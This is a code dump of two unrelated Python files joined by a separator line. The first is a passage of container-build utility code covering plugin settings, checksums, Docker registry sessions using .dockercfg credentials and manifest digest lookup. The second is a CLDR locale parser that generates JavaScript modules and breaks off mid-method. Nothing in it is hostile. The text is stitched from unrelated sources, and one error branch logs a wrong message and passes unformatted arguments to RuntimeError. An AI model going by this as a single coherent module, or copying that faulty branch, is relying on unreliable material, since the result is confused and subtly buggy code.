plugins_of_a_type = mapping.get(plugin_type, None)
if plugins_of_a_type is None:
logger.warning("there are no plugins with type '%s'",
plugin_type)
return
plugin_conf = [x for x in plugins_of_a_type if x['name'] == plugin_name]
plugins_num = len(plugin_conf)
if plugins_num == 1:
if arg_name not in plugin_conf[0]['args']:
logger.warning("no configuration value '%s' for plugin '%s', skipping",
arg_name, plugin_name)
return
logger.info("changing value '%s' of plugin '%s': '%s' -> '%s'",
arg_name, plugin_name, plugin_conf[0]['args'][arg_name], value)
plugin_conf[0]['args'][arg_name] = value
elif plugins_num <= 0:
logger.warning("there is no configuration for plugin '%s', skipping substitution",
plugin_name)
else:
logger.error("there is no configuration for plugin '%s'",
plugin_name)
raise RuntimeError("plugin '%s' was specified multiple (%d) times, can't pick one",
plugin_name, plugins_num)
def get_checksums(path, algorithms):
"""
Compute a checksum(s) of given file using specified algorithms.
:param path: path to file
:param algorithms: list of cryptographic hash functions, currently supported: md5, sha256
:return: dictionary
"""
if not algorithms:
return {}
compute_md5 = 'md5' in algorithms
compute_sha256 = 'sha256' in algorithms
if compute_md5:
md5 = hashlib.md5()
if compute_sha256:
sha256 = hashlib.sha256()
blocksize = 65536
with open(path, mode='rb') as f:
buf = f.read(blocksize)
while len(buf) > 0:
if compute_md5:
md5.update(buf)
if compute_sha256:
sha256.update(buf)
buf = f.read(blocksize)
checksums = {}
if compute_md5:
checksums['md5sum'] = md5.hexdigest()
logger.debug('md5sum: %s', checksums['md5sum'])
if compute_sha256:
checksums['sha256sum'] = sha256.hexdigest()
logger.debug('sha256sum: %s', checksums['sha256sum'])
return checksums
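# Illustrative usage (hypothetical path, not from the original module):
#   get_checksums('/tmp/image.tar', ['md5', 'sha256'])
# returns {'md5sum': '<hex digest>', 'sha256sum': '<hex digest>'}; an empty algorithm
# list yields {} and unrecognised algorithm names are silently ignored.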
def get_docker_architecture(tasker):
docker_version = tasker.get_version()
host_arch = docker_version['Arch']
if host_arch == 'amd64':
host_arch = 'x86_64'
return (host_arch, docker_version['Version'])
def get_exported_image_metadata(path, image_type):
logger.info('getting metadata for exported image %s (%s)', path, image_type)
metadata = {'path': path, 'type': image_type}
if image_type != IMAGE_TYPE_OCI:
metadata['size'] = os.path.getsize(path)
logger.debug('size: %d bytes', metadata['size'])
metadata.update(get_checksums(path, ['md5', 'sha256']))
return metadata
def get_image_upload_filename(metadata, image_id, platform):
saved_image = metadata.get('path')
image_type = metadata.get('type')
if image_type == IMAGE_TYPE_DOCKER_ARCHIVE:
base_name = 'docker-image'
elif image_type == IMAGE_TYPE_OCI_TAR:
base_name = 'oci-image'
else:
raise ValueError("Unhandled image type for upload: {}".format(image_type))
ext = saved_image.split('.', 1)[1]
name_fmt = '{base_name}-{id}.{platform}.{ext}'
return name_fmt.format(base_name=base_name, id=image_id,
platform=platform, ext=ext)
def get_version_of_tools():
"""
    Get versions of the tools the reactor is using (specified in constants.TOOLS_USED).
    :returns: list of dicts, e.g. [{"name": "docker-py", "version": "1.2.3", "path": "..."}, ...]
"""
response = []
for tool in TOOLS_USED:
pkg_name = tool["pkg_name"]
try:
tool_module = import_module(pkg_name)
except ImportError as ex:
logger.warning("can't import module %s: %r", pkg_name, ex)
else:
version = getattr(tool_module, "__version__", None)
if version is None:
logger.warning("tool %s doesn't have __version__", pkg_name)
else:
response.append({
"name": tool.get("display_name", pkg_name),
"version": version,
"path": tool_module.__file__,
})
return response
def print_version_of_tools():
"""
print versions of used tools to logger
"""
logger.info("Using these tools:")
for tool in get_version_of_tools():
logger.info("%s-%s at %s", tool["name"], tool["version"], tool["path"])
# each tuple is sorted from most preferred to least
_PREFERRED_LABELS = (
('name', 'Name'),
('version', 'Version'),
('release', 'Release'),
('architecture', 'Architecture'),
('vendor', 'Vendor'),
('authoritative-source', 'Authoritative_Registry'),
('com.redhat.component', 'BZComponent'),
('com.redhat.build-host', 'Build_Host'),
)
def get_all_label_keys(name):
"""
Return the preference chain for the naming of a particular label.
:param name: string, label name to search for
:return: tuple, label names, most preferred first
"""
for label_chain in _PREFERRED_LABELS:
if name in label_chain:
return label_chain
else:
# no variants known, return the name unchanged
return (name,)
def get_preferred_label_key(labels, name):
"""
We can have multiple variants of some labels (e.g. Version and version), sorted by preference.
This function returns the best label corresponding to "name" that is present in the "labels"
dictionary.
    Returns the name unchanged if it is not in the preference table. If the name is in the table
    but none of its variants are present in the labels dict, returns the most-preferred variant -
    the assumption is that an error will be raised later and the error message should contain
    the preferred variant.
"""
label_chain = get_all_label_keys(name)
for lbl in label_chain:
if lbl in labels:
return lbl
# none of the variants is in 'labels', return the best
return label_chain[0]
def get_preferred_label(labels, name):
key = get_preferred_label_key(labels, name)
return labels.get(key)
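# Illustrative sketch (not part of the original module), showing how the label
# preference helpers resolve between old- and new-style label names:
#
#     get_all_label_keys('version')                            # -> ('version', 'Version')
#     get_preferred_label_key({'Version': '1.0'}, 'version')   # -> 'Version'
#     get_preferred_label({'Version': '1.0'}, 'version')       # -> '1.0'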
def get_build_json():
try:
return json.loads(os.environ["BUILD"])
except KeyError:
logger.error("No $BUILD env variable. Probably not running in build container")
raise
def is_scratch_build():
build_json = get_build_json()
try:
return build_json['metadata']['labels'].get('scratch', False)
except KeyError:
logger.error('metadata.labels not found in build json')
raise
# copypasted and slightly modified from
# http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size/1094933#1094933
def human_size(num, suffix='B'):
for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1024.0:
return "%3.2f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.2f %s%s" % (num, 'Yi', suffix)
def registry_hostname(registry):
"""
Strip a reference to a registry to just the hostname:port
"""
if registry.startswith('http:') or registry.startswith('https:'):
return urlparse(registry).netloc
else:
return registry
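# Illustrative sketch (not part of the original module); the registry names are
# hypothetical:
#
#     registry_hostname('https://registry.example.com:5000')  # -> 'registry.example.com:5000'
#     registry_hostname('registry.example.com:5000')          # -> 'registry.example.com:5000'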
class Dockercfg(object):
def __init__(self, secret_path):
"""
Create a new Dockercfg object from a .dockercfg file whose
containing directory is secret_path.
:param secret_path: str, dirname of .dockercfg location
"""
self.json_secret_path = os.path.join(secret_path, '.dockercfg')
try:
with open(self.json_secret_path) as fp:
self.json_secret = json.load(fp)
except Exception:
msg = "failed to read registry secret"
logger.error(msg, exc_info=True)
raise RuntimeError(msg)
def get_credentials(self, docker_registry):
# For maximal robustness we check the host:port of the passed in
# registry against the host:port of the items in the secret. This is
# somewhat similar to what the Docker CLI does.
#
docker_registry = registry_hostname(docker_registry)
try:
return self.json_secret[docker_registry]
except KeyError:
for reg, creds in self.json_secret.items():
if registry_hostname(reg) == docker_registry:
return creds
            logger.warning('%s not found in .dockercfg', docker_registry)
return {}
class RegistrySession(object):
def __init__(self, registry, insecure=False, dockercfg_path=None):
self.registry = registry
self._resolved = None
self.insecure = insecure
self.auth = None
if dockercfg_path:
dockercfg = Dockercfg(dockercfg_path).get_credentials(registry)
username = dockercfg.get('username')
password = dockercfg.get('password')
if username and password:
self.auth = requests.auth.HTTPBasicAuth(username, password)
self._fallback = None
if re.match('http(s)?://', self.registry):
self._base = self.registry
else:
self._base = 'https://{}'.format(self.registry)
if insecure:
# In the insecure case, if the registry is just a hostname:port, we
# don't know whether to talk HTTPS or HTTP to it, so we try first
# with https then fallback
self._fallback = 'http://{}'.format(self.registry)
self.session = get_retrying_requests_session()
def _do(self, f, relative_url, *args, **kwargs):
kwargs['auth'] = self.auth
kwargs['verify'] = not self.insecure
if self._fallback:
try:
res = f(self._base + relative_url, *args, **kwargs)
self._fallback = None # don't fallback after one success
return res
except (SSLError, ConnectionError):
self._base = self._fallback
self._fallback = None
return f(self._base + relative_url, *args, **kwargs)
def get(self, relative_url, data=None, **kwargs):
return self._do(self.session.get, relative_url, **kwargs)
def head(self, relative_url, data=None, **kwargs):
return self._do(self.session.head, relative_url, **kwargs)
def post(self, relative_url, data=None, **kwargs):
return self._do(self.session.post, relative_url, data=data, **kwargs)
def put(self, relative_url, data=None, **kwargs):
return self._do(self.session.put, relative_url, data=data, **kwargs)
def delete(self, relative_url, **kwargs):
return self._do(self.session.delete, relative_url, **kwargs)
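# Illustrative usage sketch (not part of the original module). The registry name
# and dockercfg directory below are hypothetical:
#
#     session = RegistrySession('registry.example.com', insecure=False,
#                               dockercfg_path='/var/run/secrets/registry-dockercfg')
#     response = session.get('/v2/')   # relative URLs are joined to the registry base
#     response.raise_for_status()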
class ManifestDigest(dict):
"""Wrapper for digests for a docker manifest."""
content_type = {
'v1': MEDIA_TYPE_DOCKER_V2_SCHEMA1,
'v2': MEDIA_TYPE_DOCKER_V2_SCHEMA2,
'v2_list': MEDIA_TYPE_DOCKER_V2_MANIFEST_LIST,
'oci': MEDIA_TYPE_OCI_V1,
'oci_index': MEDIA_TYPE_OCI_V1_INDEX,
}
@property
def default(self):
"""Return the default manifest schema version.
Depending on the docker version, <= 1.9, used to push
the image to the registry, v2 schema may not be available.
In such case, the v1 schema should be used when interacting
with the registry. An OCI digest will only be present when
the manifest was pushed as an OCI digest.
"""
return self.v2_list or self.oci_index or self.oci or self.v2 or self.v1
def __getattr__(self, attr):
if attr not in self.content_type:
            raise AttributeError("Unknown version: %s" % attr)
else:
return self.get(attr, None)
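# Illustrative sketch (not part of the original module): digests are exposed both
# as attributes and through the 'default' property, which picks the most specific
# schema available. The digest values below are placeholders:
#
#     md = ManifestDigest(v1='sha256:aaa...', v2='sha256:bbb...')
#     md.v2       # -> 'sha256:bbb...'
#     md.oci      # -> None (not present)
#     md.default  # -> 'sha256:bbb...' (v2 preferred over v1)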
def get_manifest_media_type(version):
try:
return ManifestDigest.content_type[version]
except KeyError:
raise RuntimeError("Unknown manifest schema type")
def get_manifest_media_version(digest):
found_version = None
for version in ManifestDigest.content_type:
if digest.default and getattr(digest, version) == digest.default:
found_version = version
break
if not found_version:
raise RuntimeError("Can't detect version for digest %s" % digest)
return found_version
def get_digests_map_from_annotations(digests_str):
digests = {}
digests_annotations = json.loads(digests_str)
for digest_annotation in digests_annotations:
digest_version = digest_annotation['version']
digest = digest_annotation['digest']
media_type = get_manifest_media_type(digest_version)
digests[media_type] = digest
return digests
def query_registry(registry_session, image, digest=None, version='v1', is_blob=False):
"""Return manifest digest for image.
:param registry_session: RegistrySession
:param image: ImageName, the remote image to inspect
:param digest: str, digest of the image manifest
    :param version: str, which manifest schema version to request
:param is_blob: bool, read blob config if set to True
:return: requests.Response object
"""
context = '/'.join([x for x in [image.namespace, image.repo] if x])
reference = digest or image.tag or 'latest'
object_type = 'manifests'
if is_blob:
object_type = 'blobs'
headers = {'Accept': (get_manifest_media_type(version))}
url = '/v2/{}/{}/{}'.format(context, object_type, reference)
logger.debug("query_registry: querying {}, headers: {}".format(url, headers))
response = registry_session.get(url, headers=headers)
response.raise_for_status()
return response
def get_manifest_digests(image, registry, insecure=False, dockercfg_path=None,
versions=('v1', 'v2', 'v2_list', 'oci', 'oci_index'), require_digest=True):
"""Return manifest digest for image.
:param image: ImageName, the remote image to inspect
:param registry: str, URI for registry, if URI schema is not provided,
https:// will be used
:param insecure: bool, when True registry's cert is not verified
:param dockercfg_path: str, dirname of .dockercfg location
:param versions: tuple, which manifest schema versions to fetch digest
:param require_digest: bool, when True exception is thrown if no digest is
set in the headers.
:return: dict, versions mapped to their digest
"""
registry_session = RegistrySession(registry, insecure=insecure, dockercfg_path=dockercfg_path)
digests = {}
    # If all of the media types return a 404 NOT_FOUND status, then we re-raise
    # that exception; if the media types fail for some other reason - like
    # bad headers - then we return a ManifestDigest object with no digests.
# This is interesting for the Pulp "retry until the manifest shows up" case.
all_not_found = True
saved_not_found = None
for version in versions:
media_type = get_manifest_media_type(version)
headers = {'Accept': media_type}
try:
response = query_registry(
registry_session, image, digest=None,
version=version)
all_not_found = False
except (HTTPError, RetryError, Timeout) as ex:
if ex.response.status_code == requests.codes.not_found:
saved_not_found = ex
else:
all_not_found = False
# If the registry has a v2 manifest that can't be converted into a v1
# manifest, the registry fails with status=400 (BAD_REQUEST), and an error code of
# MANIFEST_INVALID. Note that if the registry has v2 manifest and
# you ask for an OCI manifest, the registry will try to convert the
# v2 manifest into a v1 manifest as the default type, so the same
# thing occurs.
if version != 'v2' and ex.response.status_code == requests.codes.bad_request:
logger.warning('Unable to fetch digest for %s, got error %s',
media_type, ex.response.status_code)
continue
# Returned if the manifest could not be retrieved for the given
# media type
elif (ex.response.status_code == requests.codes.not_found or
ex.response.status_code == requests.codes.not_acceptable):
continue
else:
raise
received_media_type = None
try:
received_media_type = response.headers['Content-Type']
except KeyError:
# Guess content_type from contents
try:
encoding = guess_json_utf(response.content)
manifest = json.loads(response.content.decode(encoding))
received_media_type = manifest['mediaType']
except (ValueError, # not valid JSON
KeyError) as ex: # no mediaType key
logger.warning("Unable to fetch media type: neither Content-Type header "
"nor mediaType in output was found")
if not received_media_type:
continue
# Only compare prefix as response may use +prettyjws suffix
# which is the case for signed manifest
response_h_prefix = received_media_type.rsplit('+', 1)[0]
request_h_prefix = media_type.rsplit('+', 1)[0]
if response_h_prefix != request_h_prefix:
logger.debug('request headers: %s', headers)
logger.debug('response headers: %s', response.headers)
logger.warning('Received media type %s mismatches the expected %s',
received_media_type, media_type)
continue
# set it to truthy value so that koji_import would know pulp supports these digests
digests[version] = True
logger.debug('Received media type %s', received_media_type)
if not response.headers.get('Docker-Content-Digest'):
logger.warning('Unable to fetch digest for %s, no Docker-Content-Digest header',
media_type)
continue
digests[version] = response.headers['Docker-Content-Digest']
context = '/'.join([x for x in [image.namespace, image.repo] if x])
tag = image.tag or 'latest'
logger.debug('Image %s:%s has %s manifest digest: %s',
context, tag, version, digests[version])
if not digests:
if all_not_found and len(versions) > 0:
raise saved_not_found
if require_digest:
raise RuntimeError('No digests found for {}'.format(image))
return ManifestDigest(**digests)
def get_config_from_registry(image, registry, digest, insecure=False,
dockercfg_path=None, version='v2'):
"""Return image config by digest
:param image: ImageName, the remote image to inspect
:param registry: str, URI for registry, if URI schema is not provided,
https:// will be used
:param digest: str, digest of the image manifest
:param insecure: bool, when True registry's cert is not verified
:param dockercfg_path: str, dirname of .dockercfg location
    :param version: str, which manifest schema version to request
    :return: dict, the image config blob
"""
registry_session = RegistrySession(registry, insecure=insecure, dockercfg_path=dockercfg_path)
response = query_registry(
registry_session, image, digest=digest, version=version)
response.raise_for_status()
manifest_config = response.json()
config_digest = manifest_config['config']['digest']
config_response = query_registry(
registry_session, image, digest=config_digest, version=version, is_blob=True)
config_response.raise_for_status()
blob_config = config_response.json()
context = '/'.join([x for x in [image.namespace, image.repo] if x])
tag = image.tag or 'latest'
logger.debug('Image %s:%s has config:\n%s', context, tag, blob_config)
return blob_config
def df_parser(df_path, workflow=None, cache_content=False, env_replace=True, parent_env=None):
"""
Wrapper for dockerfile_parse's DockerfileParser that takes into account
parent_env inheritance.
:param df_path: string, path to Dockerfile (normally in DockerBuildWorkflow instance)
:param workflow: DockerBuildWorkflow object instance, used to find parent image information
:param cache_content: bool, tells DockerfileParser to cache Dockerfile content
:param env_replace: bool, replace ENV declarations as part of DockerfileParser evaluation
:param parent_env: dict, parent ENV key:value pairs to be inherited
:return: DockerfileParser object instance
"""
p_env = {}
if parent_env:
# If parent_env passed in, just use that
p_env = parent_env
elif workflow:
# If parent_env is not provided, but workflow is then attempt to inspect
# the workflow for the parent_env
try:
parent_config = workflow.base_image_inspect[INSPECT_CONFIG]
except (AttributeError, TypeError, KeyError):
logger.debug("base image unable to be inspected")
else:
try:
tmp_env = parent_config["Env"]
logger.debug("Parent Config ENV: %s" % tmp_env)
if isinstance(tmp_env, dict):
p_env = tmp_env
elif isinstance(tmp_env, list):
try:
for key_val in tmp_env:
key, val = key_val.split("=", 1)
p_env[key] = val
except ValueError:
logger.debug("Unable to parse all of Parent Config ENV")
except KeyError:
logger.debug("Parent Environment not found, not applied to Dockerfile")
try:
dfparser = DockerfileParser(
df_path,
cache_content=cache_content,
env_replace=env_replace,
parent_env=p_env
)
except TypeError:
logger.debug("Old version of dockerfile-parse detected, unable to set inherited parent "
"ENVs")
dfparser = DockerfileParser(
df_path,
cache_content=cache_content,
env_replace=env_replace,
)
return dfparser
def are_plugins_in_order(plugins_conf, *plugins_names):
"""Check if plugins are configured in given order."""
all_plugins_names = [plugin['name'] for plugin in plugins_conf or []]
start_index = 0
for plugin_name in plugins_names:
try:
start_index = all_plugins_names.index(plugin_name, start_index)
except ValueError:
return False
return True
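# Illustrative sketch (not part of the original module), using a hypothetical
# plugins configuration:
#
#     conf = [{'name': 'pull_base_image'}, {'name': 'add_labels'}, {'name': 'tag_and_push'}]
#     are_plugins_in_order(conf, 'pull_base_image', 'tag_and_push')  # -> True
#     are_plugins_in_order(conf, 'tag_and_push', 'add_labels')       # -> False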
def read_yaml(yaml_file_path, schema):
with open(yaml_file_path) as f:
data = yaml.safe_load(f)
try:
resource = resource_stream('atomic_reactor', schema)
schema = codecs.getreader('utf-8')(resource)
except (IOError, TypeError):
logger.error('unable to extract JSON schema, cannot validate')
raise
try:
schema = json.load(schema)
except ValueError:
logger.error('unable to decode JSON schema, cannot validate')
raise
validator = jsonschema.Draft4Validator(schema=schema)
try:
jsonschema.Draft4Validator.check_schema(schema)
validator.validate(data)
except jsonschema.SchemaError:
logger.error('invalid schema, cannot validate')
raise
except jsonschema.ValidationError:
for error in validator.iter_errors(data):
path = ''
for element in error.absolute_path:
if isinstance(element, int):
path += '[{}]'.format(element)
else:
path += '.{}'.format(element)
if path.startswith('.'):
path = path[1:]
logger.error('validation error (%s): %s', path or 'at top level', error.message)
raise
return data
class LabelFormatter(string.Formatter):
"""
    Used because str.format can't handle keys containing dots and dashes,
    which appear in some of the labels, such as
    'authoritative-source-url', 'com.redhat.component', etc.
"""
def get_field(self, field_name, args, kwargs):
return (self.get_value(field_name, args, kwargs), field_name)
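# Illustrative sketch (not part of the original module): unlike plain str.format,
# LabelFormatter accepts keys containing dots and dashes. The label values are
# hypothetical:
#
#     fmt = LabelFormatter()
#     fmt.format('{name}-{com.redhat.component}',
#                **{'name': 'myimage', 'com.redhat.component': 'myimage-container'})
#     # -> 'myimage-myimage-container'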
class SessionWithTimeout(requests.Session):
"""
requests Session with added timeout
"""
def __init__(self, *args, **kwargs):
super(SessionWithTimeout, self).__init__(*args, **kwargs)
def request(self, *args, **kwargs):
kwargs.setdefault('timeout', HTTP_REQUEST_TIMEOUT)
return super(SessionWithTimeout, self).request(*args, **kwargs)
def get_retrying_requests_session(client_statuses=HTTP_CLIENT_STATUS_RETRY,
times=HTTP_MAX_RETRIES, delay=HTTP_BACKOFF_FACTOR,
method_whitelist=None):
retry = Retry(
total=int(times),
backoff_factor=delay,
status_forcelist=client_statuses,
method_whitelist=method_whitelist
)
session = SessionWithTimeout()
session.mount('http://', HTTPAdapter(max_retries=retry))
session.mount('https://', HTTPAdapter(max_retries=retry))
return session
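# Illustrative sketch (not part of the original module): the returned session
# retries on the configured HTTP status codes and applies a default timeout to
# every request. The URL below is hypothetical:
#
#     session = get_retrying_requests_session()
#     response = session.get('https://registry.example.com/v2/')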
def get_primary_images(workflow):
primary_images = workflow.tag_conf.primary_images
if not primary_images:
primary_images = [
ImageName.parse(primary) for primary in
workflow.build_result.annotations['repositories']['primary']]
return primary_images
|
|
#
# Jasy - Web Tooling Framework
# Copyright 2010-2012 Zynga Inc.
#
import os, json, re, xml.etree.ElementTree
import jasy.core.Console as Console
from jasy import datadir, __version__
import jasy.core.File
__all__ = ["LocaleParser"]
# Here we load our CLDR data from
CLDR_DIR = os.path.join(datadir, "cldr")
# Regular expression used for parsing CLDR plural rules
REGEXP_REL = re.compile(r"(\band\b|\bor\b)")
REGEXP_IS = re.compile(r"^(.*?) is (not )?([0-9]+)")
REGEXP_IN = re.compile(r"^(.*?) (not )?(within|in) ([0-9]+)\.\.([0-9]+)")
# Class template as used to generate JS files
CLASS_TEMPLATE = "// Automatically generated by Jasy %s\ncore.Module(\"%s\", %s);"
def camelCaseToUpper(input):
if input.upper() == input:
return input
result = []
for char in input:
conv = char.upper()
if char == conv and len(result) > 0:
result.append("_")
result.append(conv)
return "".join(result)
def pluralToJavaScript(expr):
"""
Translates the CLDR plural rules from
http://cldr.unicode.org/index/cldr-spec/plural-rules
into JavaScript expressions
"""
res = ""
for relation in REGEXP_REL.split(expr.lower()):
if relation == "and":
res += "&&"
elif relation == "or":
res += "||"
else:
match = REGEXP_IS.match(relation)
if match:
expr = match.group(1).strip()
if " " in expr:
expr = "(%s)" % re.compile(r"\s+mod\s+").sub("%", expr)
res += expr
if match.group(2) != None:
res += "!="
else:
res += "=="
res += match.group(3)
continue
match = REGEXP_IN.match(relation)
if match:
expr = match.group(1).strip()
if " " in expr:
expr = "(%s)" % re.compile(r"\s+mod\s+").sub("%", expr)
if match.group(2) != None:
res += "!"
res += "("
if match.group(3) == "in":
# Fast integer check via: http://jsperf.com/simple-integer-check
res += "~~" + expr + "==" + expr + "&&"
res += expr + ">=" + match.group(4) + "&&" + expr + "<=" + match.group(5)
res += ")"
continue
raise Exception("Unsupported relation: %s" % relation)
return res
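# Illustrative sketch (not part of the original file), translating two simple
# CLDR plural rules into JavaScript expressions:
#
#     pluralToJavaScript("n is 1")      # -> "n==1"
#     pluralToJavaScript("n in 3..10")  # -> "(~~n==n&&n>=3&&n<=10)"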
class LocaleParser():
"""Parses CLDR locales into JavaScript files"""
def __init__(self, locale):
Console.info("Parsing CLDR files for %s..." % locale)
Console.indent()
splits = locale.split("_")
# Store for internal usage
self.__locale = locale
self.__language = splits[0]
self.__territory = splits[1] if len(splits) > 1 else None
        # This will hold all extracted data
self.__data = {}
# Add info section
self.__data["info"] = {
"LOCALE" : self.__locale,
"LANGUAGE" : self.__language,
"TERRITORY" : self.__territory
}
# Add keys (fallback to C-default locale)
path = "%s.xml" % os.path.join(CLDR_DIR, "keys", self.__language)
try:
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
except IOError:
path = "%s.xml" % os.path.join(CLDR_DIR, "keys", "C")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
self.__data["key"] = {
"Short" : { key.get("type"): key.text for key in tree.findall("./keys/short/key") },
"Full" : { key.get("type"): key.text for key in tree.findall("./keys/full/key") }
}
# Add main CLDR data: Fallback chain for locales
main = os.path.join(CLDR_DIR, "main")
files = []
while True:
files.append("%s.xml" % os.path.join(main, locale))
if "_" in locale:
locale = locale[:locale.rindex("_")]
else:
break
# Extend data with root data
files.append(os.path.join(main, "root.xml"))
# Finally import all these files in order
for path in reversed(files):
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
self.__addDisplayNames(tree)
self.__addDelimiters(tree)
self.__addCalendars(tree)
self.__addNumbers(tree)
# Add supplemental CLDR data
self.__addSupplementals(self.__territory)
Console.outdent()
def export(self, path):
Console.info("Writing result...")
Console.info("Target directory: %s", path)
Console.indent()
jasy.core.File.write(os.path.join(path, "jasyproject.yaml"), 'name: locale\npackage: ""\n')
count = self.__exportRecurser(self.__data, "locale", path)
Console.info("Created %s classes", count)
Console.outdent()
def __exportRecurser(self, data, prefix, project):
counter = 0
for key in data:
# Ignore invalid values
if key is None:
continue
value = data[key]
firstIsDict = False
for childKey in value:
if type(value[childKey]) == dict:
firstIsDict = True
break
if firstIsDict:
name = "%s.%s" % (prefix, key)
counter += self.__exportRecurser(value, name, project)
else:
name = "%s.%s%s" % (prefix, key[0].upper(), key[1:])
result = CLASS_TEMPLATE % (__version__, name, json.dumps(value, sort_keys=True, indent=2, ensure_ascii=False))
filename = "%s.js" % name.replace(".", os.path.sep)
jasy.core.File.write(os.path.join(project, "src", filename), result)
counter += 1
return counter
def __getStore(self, parent, name):
""" Manages data fields """
if not name in parent:
store = {}
parent[name] = store
else:
store = parent[name]
return store
def __addSupplementals(self, territory):
""" Converts data from supplemental folder """
supplemental = os.path.join(CLDR_DIR, "supplemental")
# Plurals
path = os.path.join(supplemental, "plurals.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
self.__data["Plural"] = {}
for item in tree.findall("plurals/pluralRules"):
attr = item.get("locales")
if attr != None:
if self.__language in attr.split(" "):
for rule in item.findall("pluralRule"):
jsPlural = pluralToJavaScript(rule.text)
self.__data["Plural"][rule.get("count").upper()] = jsPlural
# Telephone Codes
path = os.path.join(supplemental, "telephoneCodeData.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
for item in tree.findall("telephoneCodeData/codesByTerritory"):
territoryId = item.get("territory")
if territoryId == territory:
for rule in item.findall("telephoneCountryCode"):
self.__data["PhoneCode"] = {"CODE":int(rule.get("code"))}
# Respect first only
break
# Postal Codes
path = os.path.join(supplemental, "postalCodeData.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
for item in tree.findall("postalCodeData/postCodeRegex"):
territoryId = item.get("territoryId")
if territory == territoryId:
self.__data["PostalCode"] = {"CODE":item.text}
break
# Supplemental Data
path = os.path.join(supplemental, "supplementalData.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
# :: Calendar Preference
ordering = None
for item in tree.findall("calendarPreferenceData/calendarPreference"):
if item.get("territories") == "001" and ordering == None:
ordering = item.get("ordering")
elif territory in item.get("territories").split(" "):
ordering = item.get("ordering")
break
self.__data["CalendarPref"] = { "ORDERING" : ordering.split(" ") }
# :: Week Data
self.__data["Week"] = {}
weekData = tree.find("weekData")
for key in ["firstDay", "weekendStart", "weekendEnd"]:
day = None
for item in weekData.findall(key):
if item.get("territories") == "001" and day == None:
day = item.get("day")
elif territory in item.get("territories").split(" "):
day = item.get("day")
break
self.__data["Week"][camelCaseToUpper(key)] = day
# :: Measurement System
self.__data["Measurement"] = {}
measurementData = tree.find("measurementData")
for key in ["measurementSystem", "paperSize"]:
mtype = None
for item in measurementData.findall(key):
if item.get("territories") == "001" and mtype == None:
mtype = item.get("type")
elif territory in item.get("territories").split(" "):
mtype = item.get("type")
break
self.__data["Measurement"][camelCaseToUpper(key)] = mtype
def __addDisplayNames(self, tree):
""" Adds CLDR display names section """
display = self.__getStore(self.__data, "display")
for key in ["languages", "scripts", "territories", "variants", "keys", "types", "measurementSystemNames"]:
# make it a little bit shorter, there is not really any conflict potential
if key == "measurementSystemNames":
store = self.__getStore(display, "Measure")
elif key == "territories":
store = self.__getStore(display, "Territory")
else:
# remove last character "s" to force singular
store = self.__getStore(display, key[:-1])
for element in tree.findall("./localeDisplayNames/%s/*" % key):
if not element.get("draft"):
field = element.get("type")
if not field in store:
store[camelCaseToUpper(field)] = element.text
def __addDelimiters(self, tree):
""" Adds CLDR delimiters """
delimiters = self.__getStore(self.__data, "delimiter")
for element in tree.findall("./delimiters/*"):
if not element.get("draft"):
field = element.tag
if not field in delimiters:
delimiters[camelCaseToUpper(field)] = element.text
def __addCalendars(self, tree, key="dates/calendars"):
""" Loops through all CLDR calendars and adds them """
calendars = self.__getStore(self.__data, "calendar")
for element in tree.findall("./%s/*" % key):
if not element.get("draft"):
self.__addCalendar(calendars, element)
def __addCalendar(self, store, element):
""" Adds data from a CLDR calendar section """
calendar = self.__getStore(store, element.get("type"))
# Months Widths
if element.find("months/monthContext/monthWidth") is not None:
months = self.__getStore(calendar, "month")
for child in element.findall("months/monthContext/monthWidth"):
if not child.get("draft"):
format = child.get("type")
if not format in months:
months[format] = {}
for month in child.findall("month"):
if not month.get("draft"):
name = month.get("type").upper()
if not name in months[format]:
months[format][name] = month.text
# Day Widths
if element.find("days/dayContext/dayWidth") is not None:
days = self.__getStore(calendar, "day")
for child in element.findall("days/dayContext/dayWidth"):
if not child.get("draft"):
format = child.get("type")
if not format in days:
days[format] = {}
for day in child.findall("day"):
if not day.get("draft"):
name = day.get("type").upper()
if not name in days[format]:
days[format][name] = day.text
# Quarter Widths
if element.find("quarters/quarterContext/quarterWidth") is not None:
quarters = self.__getStore(calendar, "quarter")
for child in element.findall("quarters/quarterContext/quarterWidth"):
if not child.get("draft"):
format = child.get("type")
if not format in quarters:
quarters[format] = {}
for quarter in child.findall("quarter"):
if not quarter.get("draft"):
name = quarter.get("type").upper()
if not name in quarters[format]:
quarters[format][name] = quarter.text
# Date Formats
if element.find("dateFormats/dateFormatLength") is not None:
dateFormats = self.__getStore(calendar, "date")
for child in element.findall("dateFormats/dateFormatLength"):
if not child.get("draft"):
format = child.get("type").upper()
text = child.find("dateFormat/pattern").text
if not format in dateFormats:
dateFormats[format] = text
# Time Formats
if element.find("timeFormats/timeFormatLength") is not None:
timeFormats = self.__getStore(calendar, "time")
for child in element.findall("timeFormats/timeFormatLength"):
if not child.get("draft"):
format = child.get("type").upper()
text = child.find("timeFormat/pattern").text
if not format in timeFormats:
timeFormats[format] = text
# DateTime Formats
if element.find("dateTimeFormats/availableFormats") is not None:
datetime = self.__getStore(calendar, "datetime")
for child in element.findall("dateTimeFormats/availableFormats/dateFormatItem"):
if not child.get("draft"):
                    # no uppercasing here, because of intentional camel case
format = child.get("id")
text = child.text
if not format in datetime:
datetime[format] = text
# Fields
if element.find("fields/field") is not None:
fields = self.__getStore(calendar, "field")
for child in element.findall("fields/field"):
if not child.get("draft"):
format = child.get("type").upper()
for nameChild in child.findall("displayName"):
if not nameChild.get("draft"):
text = nameChild.text
if not format in fields:
fields[format] = text
break
# Relative
if element.find("fields/field") is not None:
relatives = self.__getStore(calendar, "relative")
for child in element.findall("fields/field"):
if not child.get("draft"):
